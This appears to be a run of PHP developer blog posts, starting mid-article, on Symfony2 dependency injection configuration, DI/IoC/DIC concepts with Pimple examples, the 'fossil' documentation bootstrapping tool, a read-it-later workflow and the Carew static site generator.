<service id="output_formatter"
class="Gnugat\Fossil\ApplicationLayer\OutputFormatter">
</service>
<service id="console_handler"
class="Symfony\Bridge\Monolog\Handler\ConsoleHandler">
<argument type="service" id="console_output" />
<argument>true</argument>
<argument>%verbosity_level_map%</argument>
<call method="setFormatter">
<argument type="service" id="output_formatter" />
</call>
</service>
<service id="logger" class="Monolog\Logger">
<argument>default.logger</argument>
<call method="pushHandler">
<argument type="service" id="console_handler" />
</call>
</service>
<service id="filesystem"
class="Symfony\Component\Filesystem\Filesystem">
</service>
<service id="documentation_writer"
class="Gnugat\Fossil\MarkdownFile\DocumentationWriter">
<argument type="service" id="filesystem" />
<argument type="service" id="logger" />
</service>
</services>
</container>
And here's the code sample allowing you to feed the DIC with this configuration:
<?php
// File: front_controller.php
use Symfony\Component\Config\FileLocator;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Loader\XmlFileLoader;
$container = new ContainerBuilder();
$configurationDirectory = new FileLocator(__DIR__);
$loader = new XmlFileLoader($container, $configurationDirectory);
$loader->load('dic_config.xml');
$documentationWriter = $container->get('documentation_writer');
$documentationWriter->write('/tmp/example.txt', 'Hello world');
The construction of our objects has been completely removed from the code and put into a configuration file. Actually, we've replaced object construction with container initialization, which is way more concise.
Symfony2's DI component supports several configuration formats (XML, YAML, plain PHP):
I wouldn't advise you to use the YAML format, as it needs special formatting to support advanced options: strings starting with `@` reference services (`@?` for optional ones), so a literal leading `@` has to be escaped as `@@`, and `@=` introduces expressions. Not to mention the fact that it doesn't support every option (for instance you cannot declare constants as parameters).
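To illustrate the escaping, here is a hypothetical services.yml fragment (the service id and class are made up):

```yaml
services:
    my_service:
        class: Acme\MyService
        arguments:
            - "@logger"          # injects the service named "logger"
            - "@@not_a_service"  # escaped: the literal string "@not_a_service"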
On the other hand, the only thing XML doesn't support is concatenation:
<?php
use Symfony\Component\DependencyInjection\ContainerBuilder;
$container = new ContainerBuilder();
// Needs to be done in plain PHP
$container->setParameter('skeletons_path', __DIR__.'/skeletons');
XML can easily be validated, and it can also be read by many tools, such as IDEs, which can use it to provide you with blissful autocompletion.
If you're concerned about performance (reading XML might be slower than requiring plain PHP directly), Symfony2's DI component allows you to convert the configuration into plain PHP and dump it into a cache file which you can then include in your application: take a look at the documentation.
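As a sketch of that caching step, assuming the dic_config.xml file from above (the CachedContainer class name and cache path are arbitrary):

```php
<?php
// File: front_controller.php (cached variant)
use Symfony\Component\Config\FileLocator;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Dumper\PhpDumper;
use Symfony\Component\DependencyInjection\Loader\XmlFileLoader;

$cacheFile = __DIR__.'/cache/container.php';

if (!file_exists($cacheFile)) {
    // Build the container from XML once, then dump it as plain PHP
    $container = new ContainerBuilder();
    $loader = new XmlFileLoader($container, new FileLocator(__DIR__));
    $loader->load('dic_config.xml');
    $container->compile();

    $dumper = new PhpDumper($container);
    file_put_contents(
        $cacheFile,
        $dumper->dump(array('class' => 'CachedContainer'))
    );
}

require_once $cacheFile;
$container = new CachedContainer();
```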
There's a fantastic conclusion we can draw from the above section: we can reduce the lines of code of our projects simply by extracting object construction into configuration files.
Object construction is part of the "wiring layer" of your application: it doesn't solve your "business problem", nor does it solve your "application problem". It simply is the boilerplate code necessary to write those.
Let's explore the impact of wiring your application using Symfony2's DI component. You might not have noticed it, but the code samples used in the previous article as well as in this one all come from fossil, a command which allows you to bootstrap markdown files of your projects (cf this article). It uses Symfony2's Console component which requires some boilerplate code in order to create the application:
<?php
// This is the front controller of the application
// File: fossil
use Gnugat\Fossil\DocCommand;
use Symfony\Component\Config\FileLocator;
use Symfony\Component\Console\Application;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Loader\XmlFileLoader;
$container = new ContainerBuilder();
$configurationDirectory = new FileLocator(__DIR__);
$loader = new XmlFileLoader($container, $configurationDirectory);
$loader->load('dic_config.xml');
$documentationWriter = $container->get('documentation_writer');
$docCommand = new DocCommand($documentationWriter);
$application = new Application('Fossil', '2.0.0');
$application->add($docCommand);
$output = $container->get('console_output');
$application->run(null, $output);
Can you imagine what this front controller would become if we were to add more commands? You'd rather not? Me neither; that's why I advise you to put all this boilerplate code into a configuration file:
<?xml version="1.0" ?>
<!-- File: dic_config.xml -->
<container xmlns="http://symfony.com/schema/dic/services"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://symfony.com/schema/dic/services http://symfony.com/schema/dic/services/services-1.0.xsd">
<services>
<service id="console_output"
class="Symfony\Component\Console\Output\ConsoleOutput">
</service>
<service id="output_formatter"
class="Gnugat\Fossil\ApplicationLayer\OutputFormatter">
</service>
<service id="console_handler"
class="Symfony\Bridge\Monolog\Handler\ConsoleHandler">
<argument type="service" id="console_output" />
<argument>true</argument>
<argument>%verbosity_level_map%</argument>
<call method="setFormatter">
<argument type="service" id="output_formatter" />
</call>
</service>
<service id="logger" class="Monolog\Logger">
<argument>default.logger</argument>
<call method="pushHandler">
<argument type="service" id="console_handler" />
</call>
</service>
<service id="filesystem"
class="Symfony\Component\Filesystem\Filesystem">
</service>
<service id="documentation_writer"
class="Gnugat\Fossil\MarkdownFile\DocumentationWriter">
<argument type="service" id="filesystem" />
<argument type="service" id="logger" />
</service>
<service id="doc_command" class="Gnugat\Fossil\DocCommand">
<argument type="service" id="documentation_writer" />
</service>
<service id="application"
class="Symfony\Component\Console\Application">
<argument>Fossil</argument>
<argument>2.0.0</argument>
<call method="add">
<argument type="service" id="doc_command" />
</call>
</service>
</services>
</container>
Which allows us to reduce our front controller:
<?php
// This is the front controller of the application
// File: fossil
use Symfony\Component\Config\FileLocator;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Loader\XmlFileLoader;
$container = new ContainerBuilder();
$configurationDirectory = new FileLocator(__DIR__);
$loader = new XmlFileLoader($container, $configurationDirectory);
$loader->load('dic_config.xml');
$application = $container->get('application');
$output = $container->get('console_output');
$application->run(null, $output);
Now our concern is the size of the dic_config.xml file which will keep growing
each time we create new services. Don't panic! You can split it into many files
using the imports tag:
<?xml version="1.0" ?>
<!-- File: config/dic.xml -->
<container xmlns="http://symfony.com/schema/dic/services"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://symfony.com/schema/dic/services http://symfony.com/schema/dic/services/services-1.0.xsd">
<imports>
<import resource="01-application.xml" />
<import resource="02-documentation_writer.xml" />
</imports>
</container>
We created a config directory to put all those XML files, which means we
should change our front controller to:
<?php
// This is the front controller of the application
// File: fossil
use Symfony\Component\Config\FileLocator;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Loader\XmlFileLoader;
$container = new ContainerBuilder();
$configurationDirectory = new FileLocator(__DIR__.'/config');
$loader = new XmlFileLoader($container, $configurationDirectory);
$loader->load('dic.xml');
$application = $container->get('application');
$output = $container->get('console_output');
$application->run(null, $output);
The creation of the config/01-application.xml and
config/02-documentation_writer.xml files is left as an exercise for the
reader.
Symfony2's Dependency Injection component can be used outside of a Symfony2 application. It provides a powerful DIC which can be initialized from configuration files. This means that boilerplate code (also called the "wiring layer") can be removed from your code and put into configuration files, hooray!
I hope you enjoyed this article, be sure to tweet me what you think about it ;) .
We've used the component as a standalone library, but everything we've done here is possible inside a Symfony2 fullstack application.
There's also some tips I'd like to share with you:
The construction of Doctrine repositories is fully handled by the EntityManager, which means:
The previous article spoke about service locator, which is all about using DIC as a dependency. If you still don't see what it means, take a look at Symfony2 ContainerAware classes.
For example, a Symfony2 controller uses the DIC as a Service Locator. In this specific case it might be justified, as the controller shouldn't contain any logic: its purpose is to pass the request's parameters to some services, and to feed their return values as the response's parameters.
Keep in mind that in your own code, there's a 99.99% chance that using a Service Locator is an unjustified decision ;) .
If you've never heard of those (or one of those), this article will teach you what they are.
If you know what those are, but don't know the difference between them, this article will teach you what it is.
If you know what those are and what the difference between them is... Well, read this article and tell me what you think about it on Twitter ;) .
Those big names actually refer to simple design patterns and principles which might help you in your projects. Maybe you've been using them without knowing it!
This principle is very abstract, as it is based on the way you use objects rather than specifying how to write them.
To keep things short: IoC (Inversion of Control) is all about the relationship between higher level classes and detail classes. Higher level classes shouldn't depend on detail classes, but rather the contrary.
In order to ensure this, higher level classes should depend on abstractions (like interfaces) instead of depending on concrete classes. Also, you should make sure that higher level classes own detail classes.
While I understand this principle, I cannot make a better explanation than this which is really a shame. But I know a good article which can: Dependency Injection is NOT the same as the Dependency Inversion Principle, by Derick Bailey.
I really encourage you to read it as it explains very well the problem IoC tries to solve, with some good (and graphical) examples.
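To make the idea a bit more concrete, here is a minimal sketch of the principle (all names are made up): the high-level OrderProcessor owns the NotifierInterface abstraction, and the detail class EmailNotifier depends on that abstraction rather than the other way around.

```php
<?php
// The abstraction is owned by the higher level code
interface NotifierInterface
{
    public function notify($message);
}

// A detail class: it depends on the abstraction, not the contrary
class EmailNotifier implements NotifierInterface
{
    public function notify($message)
    {
        mail('admin@example.com', 'Notification', $message);
    }
}

// The higher level class only knows about the interface
class OrderProcessor
{
    private $notifier;

    public function __construct(NotifierInterface $notifier)
    {
        $this->notifier = $notifier;
    }

    public function process()
    {
        // business logic...
        $this->notifier->notify('Order processed');
    }
}
```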
Let's explain each word:
Some people instantiate those dependencies inside the class which uses them, for example:
<?php
namespace Gnugat\Fossil\MarkdownFile;
use Symfony\Component\Filesystem\Filesystem;
class DocumentationWriter
{
public function write($absolutePathname, $content)
{
$filesystem = new Filesystem();
if (!$filesystem->exists($absolutePathname)) {
$filesystem->dumpFile($absolutePathname, $content);
}
}
}
$documentationWriter = new DocumentationWriter();
$documentationWriter->write('/tmp/example.txt', 'Hello world');
There's nothing wrong with this code, but it could be improved.
First of all, Filesystem happens to be "stateless": you can call every method
it has, in any order, and it won't change the way it behaves. This means you
could create a single instance for your whole application: it would save some
precious memory.
Second of all, this class cannot be tested in isolation: if anything, you would
be testing Filesystem itself by checking whether the file was written with the
right name and content.
DI (Dependency Injection) is used to solve these two problems: you should first
create the instance of Filesystem and then pass it to (inject it into)
DocumentationWriter:
<?php
namespace Gnugat\Fossil\MarkdownFile;
use Symfony\Component\Filesystem\Filesystem;
class DocumentationWriter
{
public function write(Filesystem $filesystem, $absolutePathname, $content)
{
if (!$filesystem->exists($absolutePathname)) {
$filesystem->dumpFile($absolutePathname, $content);
}
}
}
$filesystem = new Filesystem();
$documentationWriter = new DocumentationWriter();
$documentationWriter->write($filesystem, '/tmp/example.txt', 'Hello world');
The dependency can now be shared throughout your application, and you can pass a mock of it which will be able to tell you which method was called.
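For instance, with the method-injection version above you could pass a mock and assert that dumpFile() is never called when the file already exists. A sketch, assuming PHPUnit is installed (the test class and method names are made up):

```php
<?php
use Gnugat\Fossil\MarkdownFile\DocumentationWriter;

class DocumentationWriterTest extends \PHPUnit_Framework_TestCase
{
    public function testItDoesNotOverwriteExistingFiles()
    {
        // The mock subclasses Filesystem, so it satisfies the typehint
        $filesystem = $this->getMock('Symfony\Component\Filesystem\Filesystem');
        $filesystem->expects($this->once())
            ->method('exists')
            ->with('/tmp/example.txt')
            ->will($this->returnValue(true));
        // The file exists, so dumpFile() must never be reached
        $filesystem->expects($this->never())
            ->method('dumpFile');

        $documentationWriter = new DocumentationWriter();
        $documentationWriter->write($filesystem, '/tmp/example.txt', 'Hello world');
    }
}
```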
Injection is usually done via the constructor:
<?php
namespace Gnugat\Fossil\MarkdownFile;
use Symfony\Component\Filesystem\Filesystem;
class DocumentationWriter
{
private $filesystem;
public function __construct(Filesystem $filesystem)
{
$this->filesystem = $filesystem;
}
public function write($absolutePathname, $content)
{
if (!$this->filesystem->exists($absolutePathname)) {
$this->filesystem->dumpFile($absolutePathname, $content);
}
}
}
$filesystem = new Filesystem();
$documentationWriter = new DocumentationWriter($filesystem);
$documentationWriter->write('/tmp/example.txt', 'Hello world');
From time to time, injection will be done via setters:
<?php
namespace Gnugat\Fossil\MarkdownFile;
use Symfony\Component\Filesystem\Filesystem;
class DocumentationWriter
{
private $filesystem;
public function setFilesystem(Filesystem $filesystem)
{
$this->filesystem = $filesystem;
}
public function write($absolutePathname, $content)
{
if (!$this->filesystem->exists($absolutePathname)) {
$this->filesystem->dumpFile($absolutePathname, $content);
}
}
}
$filesystem = new Filesystem();
$documentationWriter = new DocumentationWriter();
$documentationWriter->setFilesystem($filesystem);
$documentationWriter->write('/tmp/example.txt', 'Hello world');
Setter injection is used when you have no control over the object construction, and can be dangerous: if the setter isn't called, a runtime error will occur.
To help debug this kind of error, you can do this:
<?php
namespace Gnugat\Fossil\MarkdownFile;
use Symfony\Component\Filesystem\Filesystem;
class DocumentationWriter
{
private $filesystem;
public function setFilesystem(Filesystem $filesystem)
{
$this->filesystem = $filesystem;
}
public function write($absolutePathname, $content)
{
if (!$this->getFilesystem()->exists($absolutePathname)) {
$this->getFilesystem()->dumpFile($absolutePathname, $content);
}
}
private function getFilesystem()
{
if (!($this->filesystem instanceof Filesystem)) {
$msg = 'The Filesystem dependency is missing.';
$msg .= ' Did you forget to call setFilesystem?';
throw new \LogicException($msg);
}
return $this->filesystem;
}
}
$documentationWriter = new DocumentationWriter();
// Will throw an exception with a helpful message.
$documentationWriter->write('/tmp/example.txt', 'Hello world');
You shouldn't need to use setter injection in your own classes, but rather in classes which extend a third-party library.
For example, Doctrine's repositories can only be retrieved using its
EntityManager, which means you don't have control over their construction. If
you need to pass dependencies to them, you'll have to use setter injection.
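As a sketch of such a repository (the entity and repository names are made up, and $entityManager and $logger are assumed to be configured elsewhere):

```php
<?php
use Doctrine\ORM\EntityRepository;
use Monolog\Logger;

class ArticleRepository extends EntityRepository
{
    private $logger;

    // Setter injection: the EntityManager controls the constructor
    public function setLogger(Logger $logger)
    {
        $this->logger = $logger;
    }
}

// The repository is constructed by the EntityManager...
$repository = $entityManager->getRepository('Acme\Entity\Article');
// ...so the extra dependency has to be injected afterwards
$repository->setLogger($logger);
```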
The subject of the article previously quoted is the relation between DI and IoC: some people confuse them and think they're the same by simply deducing that IoC is injecting interfaces instead of concrete classes.
While combining them is possible, you should remember that IoC is first a matter of higher level classes owning their detail classes. The principle (IoC) and the design pattern (DI) are really different things.
The flaw of DI is the manual construction of all those objects: some classes might have dependencies which themselves have dependencies. And even without deep dependencies, manually creating a large number of classes is never pleasant.
The biggest risk is scattering object construction across the whole application and losing track of it: if you don't know that an object has already been constructed, you might accidentally construct it again.
Let's add a dependency on Monolog to our
DocumentationWriter (plus some custom configuration to spice it up):
<?php
use Gnugat\Fossil\ApplicationLayer\OutputFormatter;
use Gnugat\Fossil\MarkdownFile\DocumentationWriter;
use Monolog\Logger;
use Symfony\Bridge\Monolog\Handler\ConsoleHandler;
use Symfony\Component\Console\Output\ConsoleOutput;
use Symfony\Component\Console\Output\OutputInterface;
use Symfony\Component\Filesystem\Filesystem;
$verbosityLevelMap = array(
OutputInterface::VERBOSITY_NORMAL => Logger::NOTICE,
OutputInterface::VERBOSITY_VERBOSE => Logger::INFO,
OutputInterface::VERBOSITY_VERY_VERBOSE => Logger::DEBUG,
OutputInterface::VERBOSITY_DEBUG => Logger::DEBUG,
);
$consoleOutput = new ConsoleOutput();
$outputFormatter = new OutputFormatter();
$consoleHandler = new ConsoleHandler(
$consoleOutput,
true,
$verbosityLevelMap
);
$consoleHandler->setFormatter($outputFormatter);
$logger = new Logger('default.logger');
$logger->pushHandler($consoleHandler);
$filesystem = new Filesystem();
$documentationWriter = new DocumentationWriter(
$filesystem,
$logger
);
$documentationWriter->write('/tmp/example.txt', 'Hello world');
It's quite a burden isn't it?
The DIC (Dependency Injection Container) solves this problem by taking on the responsibility of creating them for you. Technically, you still write all of these lines, but instead of mixing them with business logic code you put them in a separate file.
DIC can be found in many languages:
To better understand what a DIC is, we'll take a look at Pimple, a small DIC for PHP using a JavaScript-like syntax.
Pimple can be considered as an array in which you can put parameters and "factories": anonymous functions which create instances of classes.
Here's the code sample:
<?php
// File: dic.php
use Gnugat\Fossil\ApplicationLayer\OutputFormatter;
use Gnugat\Fossil\MarkdownFile\DocumentationWriter;
use Monolog\Logger;
use Symfony\Bridge\Monolog\Handler\ConsoleHandler;
use Symfony\Component\Console\Output\ConsoleOutput;
use Symfony\Component\Console\Output\OutputInterface;
use Symfony\Component\Filesystem\Filesystem;
$dic = new Pimple();
// This is a parameter definition
$dic['verbosity_level_map'] = array(
OutputInterface::VERBOSITY_NORMAL => Logger::NOTICE,
OutputInterface::VERBOSITY_VERBOSE => Logger::INFO,
OutputInterface::VERBOSITY_VERY_VERBOSE => Logger::DEBUG,
OutputInterface::VERBOSITY_DEBUG => Logger::DEBUG,
);
// These are factory definitions
$dic['console_output'] = $dic->share(function($dic) {
return new ConsoleOutput();
});
$dic['output_formatter'] = $dic->share(function($dic) {
return new OutputFormatter();
});
// You can inject dependencies which have been declared previously
$dic['console_handler'] = $dic->share(function($dic) {
$consoleHandler = new ConsoleHandler(
$dic['console_output'],
true,
$dic['verbosity_level_map']
);
$consoleHandler->setFormatter($dic['output_formatter']);
return $consoleHandler;
});
$dic['logger'] = $dic->share(function($dic) {
$logger = new Logger('default.logger');
$logger->pushHandler($dic['console_handler']);
return $logger;
});
$dic['filesystem'] = $dic->share(function($dic) {
return new Filesystem();
});
$dic['documentation_writer'] = $dic->share(function($dic) {
return new DocumentationWriter(
$dic['filesystem'],
$dic['logger']
);
});
So, what's the big difference between this and the previous code sample? Well,
now you've centralized all your instances into a single container: the
definition of your objects is done in one central place (you can move it into a
file, dic.php for example) and, best of all, classes will be instantiated
lazily, which means that as long as you don't ask for them they won't be
created, and once created they won't be created a second time.
In your application, you just need to pass the DIC and use it:
<?php
// File: front_controller.php
require_once __DIR__.'/dic.php';
// Now you can retrieve instances from the DIC
$documentationWriter = $dic['documentation_writer'];
$documentationWriter->write('/tmp/example.txt', 'Hello world');
I must stress the fact that object creation is now centralized: the code from the first example (the one without a DIC) could be scattered across different places of your application.
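The lazy, construct-once behaviour can be observed directly (a small sketch reusing the dic.php file from above):

```php
<?php
require_once __DIR__.'/dic.php';

// Nothing has been instantiated yet: the definitions are just closures.
// The first access builds documentation_writer and its dependencies...
$first = $dic['documentation_writer'];
// ...and, because the definition used share(), every later access
// returns the very same instance.
$second = $dic['documentation_writer'];
var_dump($first === $second); // bool(true)
```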
Again, people often mix up those two for the same reason they mix up DI and IoC. There are a lot of DIC libraries which have been falsely called IoC.
Please, don't make the same mistake.
Singleton is a design pattern saying that a given object should only be instantiated once, and that it should be guarded against being instantiated a second time.
Here's an implementation example of a singleton:
<?php
// Code from https://github.com/domnikl/DesignPatternsPHP/blob/master/Singleton/Singleton.php
class Singleton
{
protected static $instance;
public static function getInstance()
{
if (null === static::$instance) {
static::$instance = new static;
}
return static::$instance;
}
private function __construct()
{
// is not allowed to call from outside: private!
}
}
While in our example the DIC makes sure our objects are constructed only once, we can't call them singletons, as nothing prevents you from creating them a second time manually.
Keep in mind that a DIC doesn't always ensure this: in our example we've used Pimple's special share method to do so, but you can also retrieve a new instance on every call:
<?php
use Symfony\Component\Finder\Finder;
$dic = new Pimple();
// Without share(), the closure is invoked on every access
$dic['finder'] = function($dic) {
return new Finder();
};
$firstFinder = $dic['finder'];
$secondFinder = $dic['finder'];
var_dump($firstFinder === $secondFinder); // bool(false): two distinct instances
To recap: DI and DIC have nothing to do with Singleton.
The classes you put into the DIC can be called Services: they will execute
a task for you when you call them.
A Service Locator isn't just a container of services which gets them when you ask it to: what we described is simply a DIC. To be a Service Locator, a DIC must be injected as a dependency.
This might happen with classes which have many dependencies: instead of injecting them one by one, you can inject the DIC directly and let the class retrieve the services it needs.
You should be warned that this is generally a bad idea: a class which requires too many dependencies should be split into several smaller classes.
There are however some cases where Service Locators are useful: for example, controllers are good candidates, as their only responsibility is to pass input to services and to return output.
To be more precise, Service Locator shouldn't be used in your business logic, but rather in objects which serve as intermediate between two layers.
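As a sketch of such an intermediary (the class name is made up; it reuses the Pimple container defined in dic.php earlier):

```php
<?php
require_once __DIR__.'/dic.php';

// A thin intermediary between the outside world (CLI, HTTP...) and the
// services: it holds no business logic, so injecting the whole container
// is acceptable here.
class DocController
{
    private $dic;

    public function __construct(Pimple $dic)
    {
        $this->dic = $dic;
    }

    public function writeAction($absolutePathname, $content)
    {
        // Simply pass the input to a service located in the DIC
        $this->dic['documentation_writer']->write($absolutePathname, $content);
    }
}

$controller = new DocController($dic);
$controller->writeAction('/tmp/example.txt', 'Hello world');
```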
Here's a good article about when to use Service Locators by Ralph Schindler.
Here's the TL;DR:
If this article didn't teach you anything and made you angry, please tweet it to me. If you learned some things, or if this article made your day, feel free to do the same ;) .
If you want to read more about DI and DIC, here's Fabien Potencier's good series on what Dependency Injection is.
There are also William Durand's slides on Writing Better Code (the slides are actually about PHP and contain good resources; I encourage you to read them entirely!).
Deprecated: Fossil is currently unmaintained.
The one thing that will make developers use your Free or Open Source Software (FOSS) project is its documentation. Without it, how can they know what it does, or how to install it?
Last summer William Durand wrote an article about it, describing the minimum files your FOSS project should have, and what they should contain.
After reading his article, maybe you did the same thing as me: you took your courage in both hands and thoroughly wrote decent documentation for the project you were working on at the time.
Because it was tedious, you decided to copy those markdown files into your new projects and adapt them.
But this too was tedious...
To solve this problem once for all I created fossil: it will bootstrap the markdown files of your FOSS projects, and it will even create an installer for you!
It generates the following files out of skeletons:
- CHANGELOG.md
- CONTRIBUTING.md
- LICENSE
- README.md
- VERSIONING.md
- bin/installer.sh
- a doc (or Resources/doc if the project is a bundle) directory containing:
  - 01-introduction.md
  - 02-installation.md
  - 03-usage.md
  - 04-tests.md

The best thing about it: you can run it on your new FOSS projects as well as
on your existing ones! By default it does not replace existing files (if you
want to, simply use the -f option).
Fossil supports different kinds of projects: applications, libraries and Symfony2 bundles. Here's a quick usage guide.
The doc command allows you to generate the markdown files of your
applications, which can be a web application or a CLI tool just like fossil.
As you can see in the following example, it only requires 2 arguments:
fossil doc 'acme/application' 'The ACME company'
Applications are installed by cloning the github repository, which makes
updating as easy as running git pull.
This argument is used in the installer script as well as in the installation instructions.
You don't need to write the whole github URL, simply give the username and the
project name in the following format: username/project-name
While the copyright date can be computed, you need to provide the author's
name to generate the LICENSE file.
For now it only generates MIT licenses, but pull requests are welcomed :) .
By default the files are created in the current directory, but you can target a specific path:
fossil doc 'acme/application' 'The ACME company' -p '/tmp/application'
As mentioned earlier, fossil won't replace existing files by default: for
instance if your project already has a README.md and a LICENSE file it will
only generate the other ones.
But if you want to throw them away, you can use this option:
fossil doc 'acme/project' 'The ACME company' -f
The doc:library command has the exact same arguments and options as the doc
one:
fossil doc:library 'acme/library' 'The ACME company'
You can use the shortcut d:l:
fossil d:l 'acme/library' 'The ACME company'
The difference between an application and a library lies in its installation: the library is installed using composer.
By default fossil assumes the composer package's name is the same as the
Github repository name (in the example it would be acme/library).
If it's not your case, use the following option:
fossil d:l 'acme/library' 'The ACME company' -c 'acme/composer-package'
The doc:bundle command has almost the same arguments and options as the
doc:library one. It has an additional argument:
fossil doc:bundle 'acme/demo-bundle' 'The ACME company' 'Acme\DemoBundle\AcmeDemoBundle'
You can use the shortcut d:b:
fossil d:b 'acme/demo-bundle' 'The ACME company' 'Acme\DemoBundle\AcmeDemoBundle'
The difference between a library and a bundle is the documentation directory,
which is in Resources/doc instead of doc.
Another difference is the installation: the bundle needs to be added in the application's kernel.
This will be detailed in the documentation, but it will also be taken care of by the installer.
That's right, you read it right: when developers run the installer, not only
will it download the bundle using composer, but it will also add its fully
qualified classname to the app/AppKernel.php file! Hooray!
The application's kernel will look like this afterwards:
<?php
// File: app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
class AppKernel extends Kernel
{
public function registerBundles()
{
$bundles = array(
// Other bundles...
new Acme\DemoBundle\AcmeDemoBundle(),
);
if (in_array($this->getEnvironment(), array('dev', 'test'))) {
// Other bundles...
}
return $bundles;
}
}
Note: because of the backslashes you should escape this argument using quotes, just like in the example.
By using this option, the bundle will be registered in the application only if it runs in development or test environment:
fossil d:b 'acme/demo-bundle' 'The ACME company' 'Acme\DemoBundle\AcmeDemoBundle' -d
The application's kernel will look like this afterwards:
<?php
// File: app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
class AppKernel extends Kernel
{
public function registerBundles()
{
$bundles = array(
// Other bundles...
);
if (in_array($this->getEnvironment(), array('dev', 'test'))) {
// Other bundles...
$bundles[] = new Acme\DemoBundle\AcmeDemoBundle();
}
return $bundles;
}
}
After running fossil you still need to provide some information (for
instance the elevator pitch in README.md) by editing those files:

- README.md
- doc/01-introduction.md
- doc/03-usage.md
- doc/04-tests.md

But is that enough? While I think fossil automates as many things as possible, there's still some part of your project that needs specific documentation.
For example you could add recipes which describe common tasks, or a glossary defining technical or business terms used in your project.
Bootstrap the markdown files of your new and your old FOSS projects using fossil, and then complete the documentation so everyone can see how awesome your work is!
Happy hacking!
Deprecated: This article has been re-written - see Read it Later
As a curious person I'm constantly trying to learn new practices and to discover tools which might help me, by collecting information via technology scouting and then reading it.
In this article, I will present how to do so effectively.
Whenever you find an interesting link, send it to Pocket so you can read it later.
To find interesting links, subscribe to blog RSS feeds using If This Then That: it will send new entries directly to Pocket.
Here are some blogs I personally follow (caution, they're not really sorted):
You can also use Twitter:
The lists only show messages (not retweets) and conversations between people you follow. They also allow you to create categories.
If you want, you can have a look at my own public lists.
Last but not least, Github can also be a great source of discoveries: by following someone who stars or watches a lot of projects, you will have them listed on your homepage.
Here's my advice: Pascal Borreli contributes to many repositories, you should start to follow him.
Collecting resources is one thing; getting them read is another. Just like Mathias Verraes advised, you should get an e-reader: you can send the pages you gathered in Pocket to it and then read them anywhere.
Pocket allows you to remove the articles you found not so interesting after all; it also allows you to archive the good ones and favorite the great ones.
Speaking of reading and e-readers, books are another good way of discovering new things. Do not underestimate them. Here's a list of books I'd recommend:
The point is: current tools won't last, and there are a lot of practices you're not aware of. If you want to improve yourself and keep up with other developers, you have to try your best to discover new practices (which might actually be rather old) and new trending tools.
I hope you found this article enjoyable and helpful.
Deprecated: This article has been re-written - see Sculpin
Frameworks are a real help when building web applications which serve business logic. But what about static websites?
Those only contain pages which could be directly written in HTML. The only problem with this approach is that HTML isn't writer-friendly compared to Markdown.
Also, we could say that static websites like blogs do have some logic behind the scenes:
But still, a framework might be too much for this task.
Static site generators are a way to solve this problem:
Carew is one of them (among Jekyll, Hyde, Poole and Lanyon): it is written in PHP, allows you to use the template engine Twig in your markdown and it provides a theme using Bootstrap.
This blog post will focus on Carew, as this very blog is written with it.
A common way to quickly publish static sites is to use Github Pages, which works as follows:

- create a repository named <username>.github.io
- commit the content of the generated web directory directly at the root of your repo
- your site is now available at http://<username>.github.io

Learn more about hosting a website built with Carew on the official website.
Creating your site using Carew is very simple, just follow these steps:
$ php composer.phar create-project carew/boilerplate <project> -s dev
$ cd <project>
$ bin/carew build
Example pages (whose sources are located in pages and posts) are converted
from markdown to HTML in the web directory.
Before writing any page or post, edit the configuration, which is located
inside the config.yml file.
Then edit the pages/index.md and pages/about.md pages with your own content.
Finally, remove the content of the posts folder and create your first blog
post using this command:
$ bin/carew generate:post [--date='YYYY-MM-DD'] title
See the configuration documentation on the official website.
Each markdown file starts with a header:
---
layout: post # no need for this line when writing a regular page
title: Will be used by `<title></title>` and `<h1></h1>`
tags:
- first tag
- carew
---
Carew generates a page listing all existing tags. You can create a link to this page with the following snippet:
{{ link('tags', 'The page with all the tags') }}.
Learn more about Front matters on the official website.
Carew is really simple to use, in this article we've covered the minimum you should know to create pages, blog posts and tags.
I hope you enjoyed this article and that it helped you a little.
If you want to learn more, for example to customize its behaviour or its theme, please refer to the official documentation.